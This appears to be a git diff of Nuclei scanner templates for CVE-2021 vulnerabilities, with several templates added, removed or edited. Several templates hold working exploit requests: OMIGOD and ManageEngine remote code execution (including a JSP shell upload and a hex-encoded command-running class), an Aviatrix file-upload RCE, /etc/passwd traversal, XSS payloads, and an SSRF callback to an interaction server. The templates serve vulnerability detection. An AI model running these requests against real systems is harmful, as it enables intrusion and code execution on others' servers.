cve,cve2021,exposure,phpfastcache,phpinfo requests: - method: GET @@ -41,5 +39,3 @@ requests: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-37833.yaml b/nuclei-templates/CVE-2021/CVE-2021-37833.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-37833.yaml rename to nuclei-templates/CVE-2021/CVE-2021-37833.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-38540.yaml b/nuclei-templates/CVE-2021/CVE-2021-38540.yaml deleted file mode 100644 index 58293f9952..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-38540.yaml +++ /dev/null @@ -1,75 +0,0 @@ -id: CVE-2021-38540 - -info: - name: Apache Airflow - Unauthenticated Variable Import - author: pdteam - severity: critical - description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-38540 - - https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E - - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E - remediation: Upgrade to Apache Airflow 2.1.3 or higher. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-38540 - cwe-id: CWE-306 - metadata: - shodan-query: title:"Sign In - Airflow" - verified: true - tags: cve,cve2021,apache,airflow,rce - -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /variable/varimport HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7 - Referer: {{RootURL}}/admin/variable/ - - ------WebKitFormBoundaryB874qcjbpxTP1Hj7 - Content-Disposition: form-data; name="csrf_token" - - {{csrf}} - ------WebKitFormBoundaryB874qcjbpxTP1Hj7 - Content-Disposition: form-data; name="file"; filename="{{randstr}}.json" - Content-Type: application/json - - { - "type": "{{randstr}}" - } - - ------WebKitFormBoundaryB874qcjbpxTP1Hj7-- - - cookie-reuse: true - extractors: - - type: regex - name: csrf - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'status_code_2 == 302' - - 'contains(all_headers_2, "session=.")' - condition: and - - - type: word - words: - - 'You should be redirected automatically to target URL: ' - - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2021/CVE-2021-38647.yaml b/nuclei-templates/CVE-2021/CVE-2021-38647.yaml new file mode 100644 index 0000000000..c9b6cc9183 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-38647.yaml @@ -0,0 +1,71 @@ +id: CVE-2021-38647 + +info: + name: Microsoft Open Management Infrastructure - Remote Code Execution + author: daffainfo,xstp + severity: critical + description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). + reference: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 + - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 + - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ + - https://github.com/microsoft/omi + remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-38647 + tags: cve,cve2021,rce,omi,microsoft + +requests: + - raw: + - | + POST /wsman HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/soap+xml;charset=UTF-8 + + + + HTTP://{{Hostname}}/wsman/ + http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem + + http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous + + http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript + 102400 + uuid:00B60932-CC01-0005-0000-000000010000 + PT1M30S + + + + + root/scx + + + + + aWQ= + + 0 + true + + + + + matchers: + - type: word + words: + - '' + - 'uid=0(root) gid=0(root) groups=0' + condition: and + +# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-38704.yaml b/nuclei-templates/CVE-2021/CVE-2021-38704.yaml deleted file mode 100644 index cfe5058168..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-38704.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-38704 - -info: - name: ClinicCases 7.3.3 Reflected Cross-Site Scripting - author: alph4byt3 - severity: medium - description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. - reference: - - https://github.com/sudonoodle/CVE-2021-38704 - - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 - - https://github.com/judsonmitchell/ClinicCases/releases - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-38704 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ClinicCases",html:"/cliniccases/" - tags: xss,cve,cve2021,cliniccases - -requests: - - method: GET - path: - - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-38751.yaml b/nuclei-templates/CVE-2021/CVE-2021-38751.yaml deleted file mode 100644 index 84b24e75e3..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-38751.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-38751 - -info: - name: ExponentCMS <= 2.6 Host Header Injection - author: dwisiswant0 - severity: medium - description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack - vector for MITM. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - - https://github.com/exponentcms/exponent-cms/issues/1544 - - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.3 - cve-id: CVE-2021-38751 - cwe-id: CWE-116 - tags: cve,cve2021,exponentcms - -requests: - - method: GET - path: - - "{{BaseURL}}" - - headers: - Host: "{{randstr}}.tld" - - matchers-condition: and - matchers: - - type: word - words: - - '{{randstr}}.tld' - - 'EXPONENT.PATH' - - 'EXPONENT.URL' - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml new file mode 100644 index 0000000000..0847c7cf42 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-39211 +info: + name: GLPI Telemetry Disclosure + author: dogasantos,noraj + severity: medium + description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 + - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 + - https://github.com/glpi-project/glpi/releases/tag/9.5.6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-39211 + cwe-id: CWE-668,CWE-200 + tags: cve,cve2021,glpi,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/ajax/telemetry.php" + - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and + matchers: + - type: word + words: + - '"uuid":' + - '"glpi":' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39226.yaml b/nuclei-templates/CVE-2021/CVE-2021-39226.yaml deleted file mode 100644 index 45283779fc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39226.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-39226 - -info: - name: Grafana Snapshot - Authentication Bypass - author: Evan Rubinstein - severity: high - description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). - reference: - - https://github.com/advisories/GHSA-69j6-29vr-p3j9 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 - - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269 - - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/ - remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - cvss-score: 7.3 - cve-id: CVE-2021-39226 - cwe-id: CWE-287 - tags: cve,cve2021,grafana - -requests: - - method: GET - path: - - "{{BaseURL}}/api/snapshots/:key" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"isSnapshot":true' - -# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39316.yaml b/nuclei-templates/CVE-2021/CVE-2021-39316.yaml deleted file mode 100644 index 220762d7e1..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39316.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-39316 - -info: - name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval - author: daffainfo - severity: high - description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter. - reference: - - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316 - - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-39316 - cwe-id: CWE-22 - tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds - -requests: - - method: GET - path: - - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39322.yaml b/nuclei-templates/CVE-2021/CVE-2021-39322.yaml deleted file mode 100644 index 80b3ada7a5..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39322.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2021-39322 - -info: - name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting - author: dhiyaneshDK - severity: medium - description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. - reference: - - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 - - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-39322 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2021/cve-2021-39327.yaml b/nuclei-templates/CVE-2021/CVE-2021-39327.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39327.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39327.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-39501.yaml b/nuclei-templates/CVE-2021/CVE-2021-39501.yaml new file mode 100644 index 0000000000..4708455ae9 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-39501.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-39501 + +info: + name: EyouCMS 1.5.4 Open Redirect + author: 0x_Akoko + severity: medium + description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function. + reference: + - https://github.com/eyoucms/eyoucms/issues/17 + - https://www.cvedetails.com/cve/CVE-2021-39501 + - https://github.com/KietNA-HPT/CVE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39501 + cwe-id: CWE-601 + tags: cve,cve2021,redirect,eyoucms,cms + +requests: + - method: GET + + path: + - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40150.yaml b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml new file mode 100644 index 0000000000..7c25b1aef3 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-40150 +info: + name: Reolink E1 Zoom Camera - Information Disclosure + author: For3stCo1d + severity: medium + description: | + The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. + An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations. + reference: + - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 + classification: + cve-id: CVE-2021-40150 + metadata: + verified: true + shodan-query: http.title:"Reolink" + tags: cve,cve2021,reolink,camera,exposure,iot +requests: + - method: GET + path: + - "{{BaseURL}}/conf/nginx.conf" + matchers-condition: and + matchers: + - type: word + words: + - "server" + - "listen" + - "fastcgi" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40438.yaml b/nuclei-templates/CVE-2021/CVE-2021-40438.yaml index 6d8f0e3541..f4e29f627b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40438.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40438.yaml @@ -1,33 +1,29 @@ id: CVE-2021-40438 info: - name: Apache <= 2.4.48 Mod_Proxy SSRF + name: Apache <= 2.4.48 - Mod_Proxy SSRF author: pdteam severity: critical - description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. + description: A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. reference: - https://firzen.de/building-a-poc-for-cve-2021-40438 - https://httpd.apache.org/security/vulnerabilities_24.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 - remediation: Upgrade to Apache version 2.4.49 or later. + tags: cve,cve2021,ssrf,apache,mod-proxy classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9 + cvss-score: 9.00 cve-id: CVE-2021-40438 cwe-id: CWE-918 - tags: cve,cve2021,ssrf,apache,mod-proxy requests: - method: GET path: - - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://interact.sh/' + - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}/' redirects: true max-redirects: 2 matchers: - type: word words: - - "Interactsh Server" - - -# Enhanced by mp on 2022/04/22 + - "Interactsh Server" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40539.yaml b/nuclei-templates/CVE-2021/CVE-2021-40539.yaml deleted file mode 100644 index 685aa50014..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40539.yaml +++ /dev/null @@ -1,116 +0,0 @@ -id: CVE-2021-40539 - -info: - name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution - author: daffainfo,pdteam - severity: critical - description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. - reference: - - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - - https://github.com/synacktiv/CVE-2021-40539 - - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 - remediation: Upgrade to ADSelfService Plus build 6114. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-40539 - cwe-id: CWE-287 - tags: cve,cve2021,rce,ad,intrusive,manageengine - -requests: - - - raw: - - | - POST /./RestAPI/LogonCustomization HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458 - - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="methodToCall" - - unspecified - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="Save" - - yes - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="form" - - smartcard - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="operation" - - Add - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp" - - <%@ page import="java.util.*,java.io.*"%> - <%@ page import="java.security.MessageDigest"%> - <% - String cve = "CVE-2021-40539"; - MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); - alg.update(cve.getBytes()); - byte[] digest = alg.digest(); - StringBuffer hashedpasswd = new StringBuffer(); - String hx; - for (int i=0;i - --8b1ab266c41afb773af2e064bc526458-- - - - | - POST /./RestAPI/LogonCustomization HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b - - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="methodToCall" - - unspecified - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="Save" - - yes - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="form" - - smartcard - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="operation" - - Add - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class" - - {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}} - --43992a07d9a30213782780204a9f032b-- - - - | - POST /./RestAPI/Connection HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22 - - - | - GET /help/admin-guide/test.jsp HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - - type: word - words: - - "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539 - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40542.yaml b/nuclei-templates/CVE-2021/CVE-2021-40542.yaml index 247ec475a8..ca8d260c4f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40542.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40542.yaml @@ -1,18 +1,17 @@ id: CVE-2021-40542 info: - name: Opensis-Classic 8.0 - Reflected Cross-Site Scripting + name: Opensis-Classic 8.0 Reflected XSS author: alph4byt3 severity: medium - description: | - Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. + description: Opensis-Classic Version 8.0 is affected by cross-site scripting (XSS). An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. reference: - https://github.com/OS4ED/openSIS-Classic/issues/189 - https://nvd.nist.gov/vuln/detail/CVE-2021-40542 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-40542 + cvss-score: 6.10 + cve-id: CVE-2021-38704 cwe-id: CWE-79 tags: xss,cve,cve2021,opensis @@ -36,5 +35,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-40859.yaml b/nuclei-templates/CVE-2021/CVE-2021-40859.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40859.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40859.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40868.yaml b/nuclei-templates/CVE-2021/CVE-2021-40868.yaml deleted file mode 100644 index 38c1061e72..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40868.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-40868 - -info: - name: Cloudron 6.2 Cross-Site Scripting - author: daffainfo - severity: medium - description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting. - reference: - - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html - - https://www.cloudron.io/ - remediation: Upgrade to Cloudron 6.3 or higher. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-40868 - cwe-id: CWE-79 - tags: cve,cve2021,xss,cloudron - -requests: - - method: GET - path: - - '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - - - type: word - words: - - '' - part: body - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40870.yaml b/nuclei-templates/CVE-2021/CVE-2021-40870.yaml new file mode 100644 index 0000000000..4bbb200201 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-40870.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-40870 + +info: + name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution + author: pikpikcu + severity: critical + description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. + reference: + - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 + - https://wearetradecraft.com/advisories/tc-2021-0002/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-40870 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-40870 + cwe-id: CWE-434 + tags: cve,cve2021,rce,aviatrix + +requests: + - raw: + - | + POST /v1/backend1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN + + - | + GET /v1/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'HACKERMAN' + - "PHP Extension" + - "PHP Version" + condition: and + +# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40875.yaml b/nuclei-templates/CVE-2021/CVE-2021-40875.yaml new file mode 100644 index 0000000000..cc9e633024 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-40875.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-40875 + +info: + name: Gurock TestRail Application files.md5 Exposure + author: oscarintherocks + severity: high + description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + reference: + - htttps://github.com/SakuraSamuraii/derailed + - https://johnjhacking.com/blog/cve-2021-40875/ + - https://www.gurock.com/testrail/tour/enterprise-edition + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-40875 + cwe-id: CWE-863 + metadata: + shodan-query: https://www.shodan.io/search?query=TestRail + tags: cve,cve2021,exposure,gurock,testrail + +requests: + - method: GET + path: + - "{{BaseURL}}/files.md5" + - "{{BaseURL}}/testrail/files.md5" + + max-size: 1000 # Define response size in bytes to read from server. + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "app/arguments/admin" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40960.yaml b/nuclei-templates/CVE-2021/CVE-2021-40960.yaml deleted file mode 100644 index f33d6c71e4..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40960.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-40960 - -info: - name: Galera WebTemplate 1.0 Directory Traversal - author: daffainfo - severity: critical - description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. - reference: - - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 - - http://www.galera.com.tr/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-40960 - cwe-id: CWE-22 - tags: cve,cve2021,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41277.yaml b/nuclei-templates/CVE-2021/CVE-2021-41277.yaml index 